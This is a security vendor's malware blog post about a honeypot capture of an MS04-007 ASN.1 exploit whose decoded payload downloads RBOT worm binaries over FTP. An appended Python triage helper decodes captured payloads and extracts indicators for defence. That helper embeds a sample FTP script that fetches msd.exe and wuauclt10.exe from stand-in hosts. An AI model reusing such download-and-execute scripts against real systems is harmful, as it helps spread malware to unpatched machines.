Apr 3
by Jonell Baltazar (Advanced Threats Researcher)

It’s been a while since I got an interesting packet capture from one of our honeypots. The packet capture honeypot intercepted a packet exploiting MS04-007, the ASN.1 vulnerability. As far as I can remember, this attack was first seen in June 2005, and we have the detections WORM_RBOT.BJF and WORM_RBOT.BJI. Note that this vulnerability is directly related to HTTP, or port 80, so this attack can bypass firewalls and is considered a web threat. The image below shows the first few bytes of the packet.

[Image: asn1.JPG, the first few bytes of the captured packet]

The data is base64-encoded so we must extract the decoded data to see its payload.

[Image: payload.JPG, the base64-decoded payload]

The packet tries to download and execute two binaries (msd.exe and wuauclt10.exe) via FTP from two different IP addresses. I was able to get a copy of the first downloaded binary but failed to get the second one. The binary file, msd.exe, is related to the WORM_RBOT family and has already been submitted to the Service team for the necessary solutions. Now, I came to realize that there are still unpatched machines connected to the internet that become zombies for malware authors. If the necessary security patch were applied, this attack would be prevented and would be of no use to the malware authors. As a friendly reminder, please apply security patches to your systems to protect them from known attacks such as the one described in this entry.
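As an added illustration (this is not code from the original post or from Trend Micro), the following Python triage helper does what the two steps above describe by hand: it locates the base64 run in a captured request, decodes it, and pulls out the FTP download hosts and file names as indicators for blocking and detection. The sample request, the placement of the token in an Authorization header, and the TEST-NET addresses are constructed assumptions.

```python
import base64
import re

# Constructed sample, not the honeypot capture from the post: an HTTP request
# carrying a base64 token (assumed here to sit in an Authorization header)
# that wraps an FTP script of the kind the post describes. IPs are TEST-NET.
FTP_SCRIPT = (
    b"\x00" * 8  # binary bytes standing in for the non-text part of the packet
    + b"open 192.0.2.10\r\nuser a a\r\nget msd.exe\r\nbye\r\n"
    + b"open 198.51.100.7\r\nuser a a\r\nget wuauclt10.exe\r\nbye\r\n"
)
SAMPLE_REQUEST = (
    b"GET / HTTP/1.1\r\nHost: victim\r\nAuthorization: Negotiate "
    + base64.b64encode(FTP_SCRIPT)
    + b"\r\n\r\n"
)

B64_RUN = re.compile(rb"[A-Za-z0-9+/]{32,}={0,2}")  # long base64-looking runs
FTP_OPEN = re.compile(rb"open\s+(\d{1,3}(?:\.\d{1,3}){3})")  # ftp "open <ip>"
FTP_GET = re.compile(rb"get\s+(\S+)")  # ftp "get <file>"


def decode_base64_runs(data: bytes) -> list[bytes]:
    """Decode every long base64 run in the capture; skip runs that do not decode."""
    decoded = []
    for match in B64_RUN.finditer(data):
        token = match.group(0)
        token += b"=" * (-len(token) % 4)  # repair padding stripped in transit
        try:
            decoded.append(base64.b64decode(token, validate=True))
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
    return decoded


def extract_ftp_iocs(data: bytes) -> dict:
    """Return download hosts and fetched file names found in decoded payloads."""
    hosts, files = [], []
    for blob in decode_base64_runs(data):
        hosts += [h.decode() for h in FTP_OPEN.findall(blob)]
        files += [f.decode() for f in FTP_GET.findall(blob)]
    return {"hosts": hosts, "files": files}


if __name__ == "__main__":
    print(extract_ftp_iocs(SAMPLE_REQUEST))
```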

Update: This is to be detected as WORM_RBOT.DLC.







© Copyright 2008 Trend Micro Inc. All rights reserved.